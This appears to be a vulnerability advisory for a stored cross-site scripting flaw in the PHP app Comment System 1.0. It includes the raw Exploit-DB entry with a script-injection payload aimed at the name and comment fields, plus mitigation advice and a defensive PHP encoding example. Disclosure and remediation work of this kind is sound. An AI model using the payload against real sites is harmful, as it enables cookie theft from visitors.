Vendor: Comment System 1.0
By: Pintu Solanki
CVSS: 8.8 (HIGH)
Stored Cross-Site Scripting
CWE: 79
Product Name: Comment System 1.0
Affected Version From: Comment System 1.0
Affected Version To: Comment System 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:comment_system_1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
2021

Comment System 1.0 – ‘multiple’ Stored Cross-Site Scripting

Comment System 1.0 is vulnerable to Stored Cross-Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the 'Your Name' and 'Comment' fields of the comment form. When a user visits the page, the malicious code will be executed in the user's browser.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the database. Additionally, output encoding should be used to prevent malicious code from being executed in the user's browser.
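
The two controls above, sketched in PHP as an added example (not code from Comment System 1.0 or from the advisory). The function names, the name pattern and the length limits are assumptions, and the `mbstring` extension is assumed to be loaded.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: names, pattern and limits are assumptions,
// not the application's own code.

/** Input validation: returns the list of fields that fail the assumed policy. */
function validate_comment(string $name, string $comment): array
{
    $errors = [];
    $name = trim($name);
    $comment = trim($comment);

    // Assumed policy: letters, digits, space and . ' - only, 1 to 50 characters.
    if (!preg_match('/^[\p{L}\p{N} .\'\-]{1,50}$/u', $name)) {
        $errors[] = 'name';
    }
    // Assumed policy: valid UTF-8, 1 to 1000 characters. Free text can
    // legitimately contain < > and quotes, so validation is not the only control.
    if ($comment === '' || !mb_check_encoding($comment, 'UTF-8')
        || mb_strlen($comment, 'UTF-8') > 1000) {
        $errors[] = 'comment';
    }
    return $errors;
}

/** Output encoding: applied every time stored text is written into HTML. */
function e(string $value): string
{
    // ENT_QUOTES encodes both quote styles, so the value is also safe
    // inside a quoted attribute; ENT_SUBSTITUTE replaces invalid byte sequences.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Renders one stored row; every dynamic value passes through e(). */
function render_comment(array $row): string
{
    return '<div class="comment"><strong>' . e($row['name']) . '</strong>'
        . '<p>' . nl2br(e($row['comment'])) . '</p></div>';
}

// Constructed input: the proof-of-concept string from this advisory in both fields.
$poc = '"><script>alert(document.cookie)</script>';

var_dump(validate_comment($poc, $poc));
echo render_comment(['name' => $poc, 'comment' => $poc]), PHP_EOL;
```

Encoding at output time also covers rows that were stored before any validation was added.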

Exploit-DB raw data:

# Exploit Title: Comment System 1.0 - 'multiple' Stored Cross-Site Scripting
# Date: 2021-02-18
# Exploit Author: Pintu Solanki
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14713/comment-system-phpmysqli-full-source-code.html
# Software: Comment System 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4


# Vulnerable Page: http://localhost/comment/index.php
# Vulnerable Input Field :

Your Name:  "><script>alert(document.cookie)</script>

Comment:    "><script>alert(document.cookie)</script>

# Payload used:

"><script>alert(document.cookie)</script>

# POC: Whenever we go to the page (http://localhost/comment/index.php) where the script is injected, the stored script will be executed.
# You will see your JavaScript code (XSS) executed.